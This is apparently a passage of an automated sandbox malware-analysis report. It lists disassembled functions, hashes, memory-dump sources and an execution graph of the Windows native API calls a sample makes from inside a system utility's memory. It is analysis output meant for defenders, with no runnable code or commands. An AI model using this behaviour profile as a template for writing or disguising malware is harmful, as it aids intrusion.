                                                              • Instruction ID: 9e59fde0e9951d0095f5f5d9432ed451f5bfaad6823f8cd96fed9893fe298ecf
                                                              • Opcode Fuzzy Hash: 677b649316090fe2559a2078c894c10ca297a765faf0dfb70402d0505fa320cf
                                                              • Instruction Fuzzy Hash: D2411031618207AFC729CE29CC42B6AB7A5FB64B10F10061DF995EB281DB31F812CBD1
                                                              Function 01242300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u
                                                              • API String ID: 48624451-3050659472
                                                              • Opcode ID: 455963fef9c5b4ce3852d13bdaaac17eef1c613dce753cec84ee99987d85f3b1
                                                              • Instruction ID: 03e47c6ed484d2204221dc3ee9744296b420e8bb337ae9ef7aff32f7a1e27eff
                                                              • Opcode Fuzzy Hash: 455963fef9c5b4ce3852d13bdaaac17eef1c613dce753cec84ee99987d85f3b1
                                                              • Instruction Fuzzy Hash: 9F315472A10619DFDB24DF69DC44BEEBBF8EF54610F444559F949E3240EB309A448FA0
                                                              Function 011D7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-
                                                              • API String ID: 1302938615-2137968064
                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction ID: ae9d91f7e9da2b68385acb94b58c0e0e0fa40f0486087e132f69bd19c116317e
                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction Fuzzy Hash: 4B91C271E002269BEF3CDF6DC8816BEBBA1EF44328F14465AE965E72C0D7309941CB52
                                                              Function 01199126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $$@
                                                              • API String ID: 0-1194432280
                                                              • Opcode ID: 5961b5af8e4b6d9700348e6324169b1646ec9f8b36b55988a3f887ac1fa90dc3
                                                              • Instruction ID: 298b1c25e129a6c18288aef1d8a5cb1ddd404f6d4d7b880108ec0de925dfb613
                                                              • Opcode Fuzzy Hash: 5961b5af8e4b6d9700348e6324169b1646ec9f8b36b55988a3f887ac1fa90dc3
                                                              • Instruction Fuzzy Hash: A8810D75D002699BDB39DB54CC44BEEBBB8AF48754F0041EAEA19B7250D7709E84CFA0
                                                              Function 0121CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 0121CFBD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: CallFilterFunc@8
                                                              • String ID: @$@4_w@4_w
                                                              • API String ID: 4062629308-713214301
                                                              • Opcode ID: 99bd897399fc2c0029b92976d2d9774c2c94c5d72d58430e195348286c15cf46
                                                              • Instruction ID: b3900edc3be5dd235bad137edd37cec49081b8b57e0ed0f7f38931f497729004
                                                              • Opcode Fuzzy Hash: 99bd897399fc2c0029b92976d2d9774c2c94c5d72d58430e195348286c15cf46
                                                              • Instruction Fuzzy Hash: 4141F375911219DFCB25EFE9C844A6EBBF8FF64B14F00402AEA14DB258D730C801CB60

                                                              Execution Graph

                                                              Execution Coverage:2.4%
                                                              Dynamic/Decrypted Code Coverage:4.3%
                                                              Signature Coverage:2.3%
                                                              Total number of Nodes:439
                                                              Total number of Limit Nodes:71
                                                              execution_graph 101590 aa9f20 101592 aa9f2f 101590->101592 101591 aa9f6d 101592->101591 101593 aa9f5a CreateThread 101592->101593 101594 aab960 101597 acb760 101594->101597 101596 aacfd1 101600 ac98e0 101597->101600 101599 acb791 101599->101596 101601 ac9978 101600->101601 101603 ac990e 101600->101603 101602 ac998b NtAllocateVirtualMemory 101601->101602 101602->101599 101603->101599 101604 ab71a0 101605 ab71ca 101604->101605 101608 ab8330 101605->101608 101607 ab71f1 101609 ab834d 101608->101609 101615 ac8f10 101609->101615 101611 ab839d 101612 ab83a4 101611->101612 101620 ac8ff0 101611->101620 101612->101607 101614 ab83cd 101614->101607 101616 ac8fab 101615->101616 101617 ac8f3b 101615->101617 101625 33d2f30 LdrInitializeThunk 101616->101625 101617->101611 101618 ac8fe1 101618->101611 101621 ac901f 101620->101621 101622 ac90a1 101620->101622 101621->101614 101626 33d2d10 LdrInitializeThunk 101622->101626 101623 ac90e3 101623->101614 101625->101618 101626->101623 101627 ab11e0 101628 ab11fa 101627->101628 101633 ab4990 101628->101633 101630 ab1215 101631 ab1249 PostThreadMessageW 101630->101631 101632 ab125a 101630->101632 101631->101632 101634 ab49b4 101633->101634 101635 ab49bb 101634->101635 101636 ab49f7 LdrLoadDll 101634->101636 101635->101630 101636->101635 101637 ab7720 101638 ab778f 101637->101638 101639 ab7738 101637->101639 101639->101638 101641 abb660 101639->101641 101642 abb686 101641->101642 101643 abb8b3 101642->101643 101668 ac9b50 101642->101668 101643->101638 101645 abb6f9 101645->101643 101671 acc9c0 101645->101671 101647 abb718 101647->101643 101648 abb7ec 101647->101648 101677 ac8e30 101647->101677 101651 ab5f50 LdrInitializeThunk 101648->101651 101652 abb80b 101648->101652 101651->101652 101654 abb89b 101652->101654 101688 ac89a0 101652->101688 101653 abb7d4 101684 ab8500 101653->101684 101662 ab8500 LdrInitializeThunk 101654->101662 101656 abb783 101656->101643 101656->101653 101657 abb7b2 101656->101657 101681 ab5f50 101656->101681 101703 ac4ae0 LdrInitializeThunk 101657->101703 101664 abb8a9 101662->101664 101663 abb872 101693 ac8a50 101663->101693 101664->101638 101666 abb88c 101698 ac8bb0 101666->101698 101669 ac9b6d 101668->101669 101670 ac9b7e CreateProcessInternalW 101669->101670 101670->101645 101672 acc930 101671->101672 101674 acc98d 101672->101674 101704 acb8d0 101672->101704 101674->101647 101675 acc96a 101707 acb7f0 101675->101707 101678 ac8e4a 101677->101678 101716 33d2c0a 101678->101716 101679 abb77a 101679->101648 101679->101656 101682 ac8ff0 LdrInitializeThunk 101681->101682 101683 ab5f8b 101681->101683 101682->101683 101683->101657 101685 ab8513 101684->101685 101719 ac8d30 101685->101719 101687 ab853e 101687->101638 101689 ac8a1d 101688->101689 101690 ac89cb 101688->101690 101725 33d39b0 LdrInitializeThunk 101689->101725 101690->101663 101691 ac8a3f 101691->101663 101694 ac8ad0 101693->101694 101696 ac8a7e 101693->101696 101726 33d4340 LdrInitializeThunk 101694->101726 101695 ac8af2 101695->101666 101696->101666 101699 ac8bde 101698->101699 101700 ac8c30 101698->101700 101699->101654 101727 33d2fb0 LdrInitializeThunk 101700->101727 101701 ac8c52 101701->101654 101703->101653 101710 ac9a90 101704->101710 101706 acb8e8 101706->101675 101713 ac9ad0 101707->101713 101709 acb806 101709->101674 101711 ac9aaa 101710->101711 101712 ac9ab8 RtlAllocateHeap 101711->101712 101712->101706 101714 ac9aea 101713->101714 101715 ac9af8 RtlFreeHeap 101714->101715 101715->101709 101717 33d2c1f LdrInitializeThunk 101716->101717 101718 33d2c11 101716->101718 101717->101679 101718->101679 101720 ac8d5b 101719->101720 101721 ac8dae 101719->101721 101720->101687 101724 33d2dd0 LdrInitializeThunk 101721->101724 101722 ac8dd0 101722->101687 101724->101722 101725->101691 101726->101695 101727->101701 101728 ac96e0 101729 ac9757 101728->101729 101731 ac970b 101728->101731 101730 ac976a NtDeleteFile 101729->101730 101732 ac8c60 101733 ac8cf2 101732->101733 101735 ac8c8e 101732->101735 101737 33d2ee0 LdrInitializeThunk 101733->101737 101734 ac8d20 101737->101734 101738 ac8de0 101739 ac8dfa 101738->101739 101742 33d2df0 LdrInitializeThunk 101739->101742 101740 ac8e1f 101742->101740 101744 ab2ba5 101747 ab66d0 101744->101747 101746 ab2bd0 101748 ab6703 101747->101748 101749 ab6727 101748->101749 101754 ac9300 101748->101754 101749->101746 101751 ab674a 101751->101749 101758 ac9780 101751->101758 101753 ab67ca 101753->101746 101755 ac931a 101754->101755 101761 33d2ca0 LdrInitializeThunk 101755->101761 101756 ac9343 101756->101751 101759 ac979a 101758->101759 101760 ac97a8 NtClose 101759->101760 101760->101753 101761->101756 101767 acc8f0 101768 acb7f0 RtlFreeHeap 101767->101768 101769 acc905 101768->101769 101772 aba001 101773 aba016 101772->101773 101774 aba01b 101772->101774 101775 acb7f0 RtlFreeHeap 101774->101775 101776 aba04d 101774->101776 101775->101776 101777 aa9f80 101778 aaa2cb 101777->101778 101780 aaa659 101778->101780 101781 acb450 101778->101781 101782 acb476 101781->101782 101787 aa4230 101782->101787 101784 acb4bb 101784->101780 101785 acb482 101785->101784 101790 ac5950 101785->101790 101794 ab3650 101787->101794 101789 aa423d 101789->101785 101791 ac59b2 101790->101791 101793 ac59bf 101791->101793 101805 ab1e00 101791->101805 101793->101784 101795 ab366d 101794->101795 101797 ab3680 101795->101797 101798 aca1c0 101795->101798 101797->101789 101799 aca1da 101798->101799 101800 aca209 101799->101800 101801 ac8e30 LdrInitializeThunk 101799->101801 101800->101797 101802 aca266 101801->101802 101803 acb7f0 RtlFreeHeap 101802->101803 101804 aca27f 101803->101804 101804->101797 101806 ab1e3b 101805->101806 101821 ab8290 101806->101821 101808 ab1e43 101809 acb8d0 RtlAllocateHeap 101808->101809 101820 ab211b 101808->101820 101810 ab1e59 101809->101810 101811 acb8d0 RtlAllocateHeap 101810->101811 101812 ab1e6a 101811->101812 101813 acb8d0 RtlAllocateHeap 101812->101813 101815 ab1e7b 101813->101815 101816 ab1f15 101815->101816 101836 ab6e30 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 101815->101836 101817 ab4990 LdrLoadDll 101816->101817 101818 ab20cd 101817->101818 101832 ac8290 101818->101832 101820->101793 101822 ab82bc 101821->101822 101837 ab8180 101822->101837 101825 ab82e9 101827 ab82f4 101825->101827 101828 ac9780 NtClose 101825->101828 101826 ab8301 101829 ac9780 NtClose 101826->101829 101830 ab831d 101826->101830 101827->101808 101828->101827 101831 ab8313 101829->101831 101830->101808 101831->101808 101833 ac82f2 101832->101833 101835 ac82ff 101833->101835 101848 ab2130 101833->101848 101835->101820 101836->101816 101838 ab8276 101837->101838 101839 ab819a 101837->101839 101838->101825 101838->101826 101843 ac8ec0 101839->101843 101842 ac9780 NtClose 101842->101838 101844 ac8edd 101843->101844 101847 33d35c0 LdrInitializeThunk 101844->101847 101845 ab826a 101845->101842 101847->101845 101851 ab2150 101848->101851 101864 ab8560 101848->101864 101850 ab26b3 101850->101835 101851->101850 101868 ac1510 101851->101868 101854 ab2372 101855 acc9c0 2 API calls 101854->101855 101858 ab2387 101855->101858 101856 ab21ae 101856->101850 101871 acc890 101856->101871 101857 ab8500 LdrInitializeThunk 101860 ab23cb 101857->101860 101858->101860 101876 ab0c80 101858->101876 101860->101850 101860->101857 101861 ab0c80 LdrInitializeThunk 101860->101861 101861->101860 101862 ab2520 101862->101860 101863 ab8500 LdrInitializeThunk 101862->101863 101863->101862 101865 ab856d 101864->101865 101866 ab858c SetErrorMode 101865->101866 101867 ab8593 101865->101867 101866->101867 101867->101851 101869 acb760 NtAllocateVirtualMemory 101868->101869 101870 ac1531 101868->101870 101869->101870 101870->101856 101872 acc8a6 101871->101872 101873 acc8a0 101871->101873 101874 acb8d0 RtlAllocateHeap 101872->101874 101873->101854 101875 acc8cc 101874->101875 101875->101854 101877 ab0c91 101876->101877 101880 ac9a00 101877->101880 101881 ac9a1a 101880->101881 101884 33d2c70 LdrInitializeThunk 101881->101884 101882 ab0ca2 101882->101862 101884->101882 101885 abfc00 101886 abfc64 101885->101886 101887 ab66d0 2 API calls 101886->101887 101889 abfd97 101887->101889 101888 abfd9e 101889->101888 101914 ab67e0 101889->101914 101891 abff43 101892 abfe1a 101892->101891 101893 abff52 101892->101893 101918 abf9f0 101892->101918 101894 ac9780 NtClose 101893->101894 101896 abff5c 101894->101896 101897 abfe56 101897->101893 101898 abfe61 101897->101898 101899 acb8d0 RtlAllocateHeap 101898->101899 101900 abfe8a 101899->101900 101901 abfea9 101900->101901 101902 abfe93 101900->101902 101927 abf8e0 CoInitialize 101901->101927 101903 ac9780 NtClose 101902->101903 101905 abfe9d 101903->101905 101906 abfeb7 101930 ac9270 101906->101930 101908 abff32 101909 ac9780 NtClose 101908->101909 101910 abff3c 101909->101910 101911 acb7f0 RtlFreeHeap 101910->101911 101911->101891 101912 abfed5 101912->101908 101913 ac9270 LdrInitializeThunk 101912->101913 101913->101912 101915 ab6805 101914->101915 101934 ac9130 101915->101934 101919 abfa0c 101918->101919 101920 ab4990 LdrLoadDll 101919->101920 101922 abfa27 101920->101922 101921 abfa30 101921->101897 101922->101921 101923 ab4990 LdrLoadDll 101922->101923 101924 abfafb 101923->101924 101925 ab4990 LdrLoadDll 101924->101925 101926 abfb55 101924->101926 101925->101926 101926->101897 101929 abf945 101927->101929 101928 abf9db CoUninitialize 101928->101906 101929->101928 101931 ac928d 101930->101931 101939 33d2ba0 LdrInitializeThunk 101931->101939 101932 ac92ba 101932->101912 101935 ac914a 101934->101935 101938 33d2c60 LdrInitializeThunk 101935->101938 101936 ab6879 101936->101892 101938->101936 101939->101932 101940 abb140 101945 abae50 101940->101945 101942 abb14d 101959 abaac0 101942->101959 101944 abb163 101946 abae75 101945->101946 101970 ab8760 101946->101970 101949 abafc3 101949->101942 101951 abafda 101951->101942 101952 abafd1 101952->101951 101954 abb0c7 101952->101954 101989 aba510 101952->101989 101956 abb12a 101954->101956 101998 aba880 101954->101998 101957 acb7f0 RtlFreeHeap 101956->101957 101958 abb131 101957->101958 101958->101942 101960 abaad6 101959->101960 101963 abaae1 101959->101963 101961 acb8d0 RtlAllocateHeap 101960->101961 101961->101963 101962 abab08 101962->101944 101963->101962 101964 ab8760 GetFileAttributesW 101963->101964 101965 abae22 101963->101965 101968 aba510 RtlFreeHeap 101963->101968 101969 aba880 RtlFreeHeap 101963->101969 101964->101963 101966 abae3b 101965->101966 101967 acb7f0 RtlFreeHeap 101965->101967 101966->101944 101967->101966 101968->101963 101969->101963 101971 ab877f 101970->101971 101972 ab8786 GetFileAttributesW 101971->101972 101973 ab8791 101971->101973 101972->101973 101973->101949 101974 ac36f0 101973->101974 101975 ac36fe 101974->101975 101976 ac3705 101974->101976 101975->101952 101977 ab4990 LdrLoadDll 101976->101977 101978 ac3737 101977->101978 101979 ac3746 101978->101979 102002 ac31b0 LdrLoadDll 101978->102002 101981 acb8d0 RtlAllocateHeap 101979->101981 101985 ac38f1 101979->101985 101982 ac375f 101981->101982 101983 ac38e7 101982->101983 101982->101985 101986 ac377b 101982->101986 101984 acb7f0 RtlFreeHeap 101983->101984 101983->101985 101984->101985 101985->101952 101986->101985 101987 acb7f0 RtlFreeHeap 101986->101987 101988 ac38db 101987->101988 101988->101952 101990 aba536 101989->101990 102003 abdf40 101990->102003 101992 aba5a8 101994 aba730 101992->101994 101996 aba5c6 101992->101996 101993 aba715 101993->101952 101994->101993 101995 aba3d0 RtlFreeHeap 101994->101995 101995->101994 101996->101993 102008 aba3d0 101996->102008 101999 aba8a6 101998->101999 102000 abdf40 RtlFreeHeap 101999->102000 102001 aba92d 102000->102001 102001->101954 102002->101979 102005 abdf64 102003->102005 102004 abdf6d 102004->101992 102005->102004 102006 acb7f0 RtlFreeHeap 102005->102006 102007 abdfb0 102006->102007 102007->101992 102009 aba3ed 102008->102009 102012 abdfc0 102009->102012 102011 aba4f3 102011->101996 102013 abdfe4 102012->102013 102014 abe08e 102013->102014 102015 acb7f0 RtlFreeHeap 102013->102015 102014->102011 102015->102014 102016 ab7540 102017 ab755c 102016->102017 102025 ab75af 102016->102025 102019 ac9780 NtClose 102017->102019 102017->102025 102018 ab76e7 102022 ab7577 102019->102022 102021 ab76c1 102021->102018 102028 ab6b30 NtClose LdrInitializeThunk LdrInitializeThunk 102021->102028 102026 ab6960 NtClose LdrInitializeThunk LdrInitializeThunk 102022->102026 102025->102018 102027 ab6960 NtClose LdrInitializeThunk LdrInitializeThunk 102025->102027 102026->102025 102027->102021 102028->102018 102029 ac9480 102030 ac9537 102029->102030 102032 ac94af 102029->102032 102031 ac954a NtCreateFile 102030->102031 102033 ac63c0 102034 ac641a 102033->102034 102036 ac6427 102034->102036 102037 ac3e10 102034->102037 102038 acb760 NtAllocateVirtualMemory 102037->102038 102039 ac3e51 102038->102039 102040 ab4990 LdrLoadDll 102039->102040 102043 ac3f50 102039->102043 102041 ac3e91 102040->102041 102042 ac3ed2 Sleep 102041->102042 102041->102043 102042->102041 102043->102036 102044 ac0500 102045 ac051d 102044->102045 102046 ab4990 LdrLoadDll 102045->102046 102047 ac0538 102046->102047 102048 ac1b40 102049 ac1b5c 102048->102049 102050 ac1b98 102049->102050 102051 ac1b84 102049->102051 102053 ac9780 NtClose 102050->102053 102052 ac9780 NtClose 102051->102052 102055 ac1b8d 102052->102055 102054 ac1ba1 102053->102054 102058 acb910 RtlAllocateHeap 102054->102058 102057 ac1bac 102058->102057 102059 33d2ad0 LdrInitializeThunk 102060 ab8c04 102062 ab8c14 102060->102062 102061 ab8adf 102062->102061 102064 ab74c0 102062->102064 102065 ab74d6 102064->102065 102067 ab750c 102064->102067 102065->102067 102068 ab7330 LdrLoadDll 102065->102068 102067->102061 102068->102067 102069 ab3553 102070 ab8180 2 API calls 102069->102070 102071 ab3563 102070->102071 102072 ab357f 102071->102072 102073 ac9780 NtClose 102071->102073 102073->102072 102074 ab26d0 102075 ab2706 102074->102075 102076 ac8e30 LdrInitializeThunk 102074->102076 102079 ac9810 102075->102079 102076->102075 102078 ab271b 102080 ac989f 102079->102080 102081 ac983b 102079->102081 102084 33d2e80 LdrInitializeThunk 102080->102084 102081->102078 102082 ac98cd 102082->102078 102084->102082 102085 ab5fd0 102086 ab8500 LdrInitializeThunk 102085->102086 102087 ab6000 102085->102087 102086->102087 102089 ab602c 102087->102089 102090 ab8480 102087->102090 102091 ab84c4 102090->102091 102092 ab84e5 102091->102092 102097 ac8b00 102091->102097 102092->102087 102094 ab84d5 102095 ab84f1 102094->102095 102096 ac9780 NtClose 102094->102096 102095->102087 102096->102092 102098 ac8b7d 102097->102098 102100 ac8b2b 102097->102100 102102 33d4650 LdrInitializeThunk 102098->102102 102099 ac8b9f 102099->102094 102100->102094 102102->102099 102103 abc9d0 102105 abc9f9 102103->102105 102104 abcafc 102105->102104 102106 abcaa0 FindFirstFileW 102105->102106 102106->102104 102108 abcabb 102106->102108 102107 abcae3 FindNextFileW 102107->102108 102109 abcaf5 FindClose 102107->102109 102108->102107 102109->102104 102110 ac1ed0 102111 ac1ee9 102110->102111 102112 ac1f31 102111->102112 102115 ac1f71 102111->102115 102117 ac1f76 102111->102117 102113 acb7f0 RtlFreeHeap 102112->102113 102114 ac1f41 102113->102114 102116 acb7f0 RtlFreeHeap 102115->102116 102116->102117 102128 ac16d1 102133 ac95f0 102128->102133 102130 ac16f2 102131 ac9780 NtClose 102130->102131 102132 ac1719 102131->102132 102134 ac969a 102133->102134 102136 ac961e 102133->102136 102135 ac96ad NtReadFile 102134->102135 102135->102130 102136->102130

                                                              Executed Functions

                                                              Function 00AA9F80 Relevance: 26.7, Strings: 21, Instructions: 431COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 26 aa9f80-aaa2c1 27 aaa2cb-aaa2d5 26->27 28 aaa321-aaa32b 27->28 29 aaa2d7-aaa2f6 27->29 32 aaa33c-aaa348 28->32 30 aaa308-aaa319 29->30 31 aaa2f8-aaa306 29->31 33 aaa31f 30->33 31->33 34 aaa34a-aaa354 32->34 35 aaa356 32->35 33->27 34->32 36 aaa35d-aaa364 35->36 38 aaa396-aaa3a0 36->38 39 aaa366-aaa394 36->39 40 aaa3b1-aaa3bd 38->40 39->36 41 aaa3bf-aaa3cb 40->41 42 aaa3cd-aaa3d7 40->42 41->40 44 aaa3e8-aaa3f4 42->44 45 aaa40b-aaa41c 44->45 46 aaa3f6-aaa409 44->46 48 aaa42d-aaa436 45->48 46->44 49 aaa438-aaa44a 48->49 50 aaa44c-aaa456 48->50 49->48 51 aaa467-aaa473 50->51 53 aaa48a-aaa48e 51->53 54 aaa475-aaa488 51->54 56 aaa490-aaa4b5 53->56 57 aaa4b7 53->57 54->51 56->53 58 aaa4be-aaa4c7 57->58 59 aaa4cd-aaa4d4 58->59 60 aaa5d0-aaa5da 58->60 61 aaa506-aaa509 59->61 62 aaa4d6-aaa504 59->62 63 aaa5eb-aaa5f7 60->63 64 aaa50f-aaa518 61->64 62->59 65 aaa5f9-aaa60c 63->65 66 aaa60e-aaa618 63->66 67 aaa51a-aaa532 64->67 68 aaa534-aaa543 64->68 65->63 70 aaa629-aaa635 66->70 67->64 71 aaa54a-aaa554 68->71 72 aaa545 68->72 73 aaa647-aaa64e 70->73 74 aaa637-aaa63d 70->74 77 aaa565-aaa571 71->77 72->60 75 aaa6f7-aaa6fb 73->75 76 aaa654 call acb450 73->76 78 aaa63f-aaa642 74->78 79 aaa645 74->79 83 aaa73c-aaa746 75->83 84 aaa6fd-aaa71e 75->84 90 aaa659-aaa663 76->90 80 aaa573-aaa585 77->80 81 aaa587-aaa59b 77->81 78->79 79->70 80->77 86 aaa5ac-aaa5b5 81->86 91 aaa757-aaa760 83->91 88 aaa72c-aaa73a 84->88 89 aaa720-aaa729 84->89 92 aaa5cb 86->92 93 aaa5b7-aaa5c9 86->93 88->75 89->88 94 aaa674-aaa67d 90->94 95 aaa762-aaa772 91->95 96 aaa774-aaa77e 91->96 92->58 93->86 97 aaa67f-aaa68b 94->97 98 aaa68d-aaa694 94->98 95->91 100 aaa780-aaa79a 96->100 101 aaa7b6-aaa7ba 96->101 97->94 105 aaa6bd-aaa6c7 98->105 106 aaa696-aaa6a7 98->106 108 aaa79c-aaa7a0 100->108 109 aaa7a1-aaa7a3 100->109 103 aaa7bc-aaa7d3 101->103 104 aaa7d5-aaa7df 101->104 103->101 110 aaa7f0-aaa7fa 104->110 113 aaa6d8-aaa6e4 105->113 111 aaa6a9-aaa6ad 106->111 112 aaa6ae-aaa6b0 106->112 108->109 114 aaa7b4 109->114 115 aaa7a5-aaa7ae 109->115 117 aaa7fc-aaa80f 110->117 118 aaa811-aaa81a 110->118 111->112 119 aaa6bb 112->119 120 aaa6b2-aaa6b8 112->120 113->75 116 aaa6e6-aaa6f5 113->116 114->96 115->114 116->113 117->110 119->98 120->119
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ".$'$-q$.j$1G$4U$7$9$@<$B0$Ng$T_$[_$dr$n$o$tp$u$z$R$i
                                                              • API String ID: 0-3230942322
                                                              • Opcode ID: 565d49982be5d2fecd96f2312bcf1fb6285dfecf25d0133e7957dac8d74b5b7a
                                                              • Instruction ID: 71bdc31d0fbda34ae5f94fd0915ed53cf544d5e2eb7a3ceac4c508915eea6bdc
                                                              • Opcode Fuzzy Hash: 565d49982be5d2fecd96f2312bcf1fb6285dfecf25d0133e7957dac8d74b5b7a
                                                              • Instruction Fuzzy Hash: 9432C0B0E0562DCFEB24CF44C894BDDBBB1BB56308F5081D9D04A6B280C7B95A89CF56
                                                              Function 00ABC9D0 Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,00000000), ref: 00ABCAB1
                                                              • FindNextFileW.KERNELBASE(?,00000010), ref: 00ABCAEE
                                                              • FindClose.KERNELBASE(?), ref: 00ABCAF9
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Find$File$CloseFirstNext
                                                              • String ID:
                                                              • API String ID: 3541575487-0
                                                              • Opcode ID: 9efabfec53aab301c1426a02d9abc6dfc8d0331be8f0d257ef249e84ffe0ed2d
                                                              • Instruction ID: 029b9a7561792010b503614459de7d6d7114c9038543ef20e4712cf79a645c62
                                                              • Opcode Fuzzy Hash: 9efabfec53aab301c1426a02d9abc6dfc8d0331be8f0d257ef249e84ffe0ed2d
                                                              • Instruction Fuzzy Hash: D23170B29003087BDB20DFA4CD86FEF77BD9F44755F14455CB949AB181DBB0AA848BA0
                                                              Function 00AC9480 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtCreateFile.NTDLL(?,?,5BC7A5B0,?,?,?,?,?,?,?,?), ref: 00AC957B
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 8ba261b2d37e6a8c686c9a337af97115225191aaef6764030400665b8a8f1ef3
                                                              • Instruction ID: 91153756f05a3252443c363c9663812ae60cb157ab7251fc4136fb25c3a0a039
                                                              • Opcode Fuzzy Hash: 8ba261b2d37e6a8c686c9a337af97115225191aaef6764030400665b8a8f1ef3
                                                              • Instruction Fuzzy Hash: 5D31CDB5A01248AFCB54DF98D981EEEB7F9AF88704F108219F909A7340D734A951CBA5
                                                              Function 00AC95F0 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtReadFile.NTDLL(?,?,5BC7A5B0,?,?,?,?,?,?), ref: 00AC96D6
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: 8854d8be901c82b9d220803e696c0cf83c1867f68dd6e83b9ca46992c6265491
                                                              • Instruction ID: c80b4028cc00d84493b5f1e6f379d7005f372e303a025ae6d03a267e96450b7c
                                                              • Opcode Fuzzy Hash: 8854d8be901c82b9d220803e696c0cf83c1867f68dd6e83b9ca46992c6265491
                                                              • Instruction Fuzzy Hash: 3831D4B5A00208AFCB14DF98D981EEFB7F9EF8D704F118209F958A7240D734A911CBA5
                                                              Function 00AC98E0 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00AB21AE,?,5BC7A5B0,00000000,00000004,00003000,?,?,?,?,?,00AC82FF,00AB21AE), ref: 00AC99A8
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: 5b92f69d731c09572eaa479caca9063e28d84d04115c7dc8f8bf517fd5e8e384
                                                              • Instruction ID: de06201efa7c3122d978050c3dab34b4f3ee1b819c17dec1427061b5d05c8ec1
                                                              • Opcode Fuzzy Hash: 5b92f69d731c09572eaa479caca9063e28d84d04115c7dc8f8bf517fd5e8e384
                                                              • Instruction Fuzzy Hash: E72119B5A00249ABDB10DF98DD41FEFB7B9EF89704F10410DF949AB240D774A9118BA5
                                                              Function 00AC96E0 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
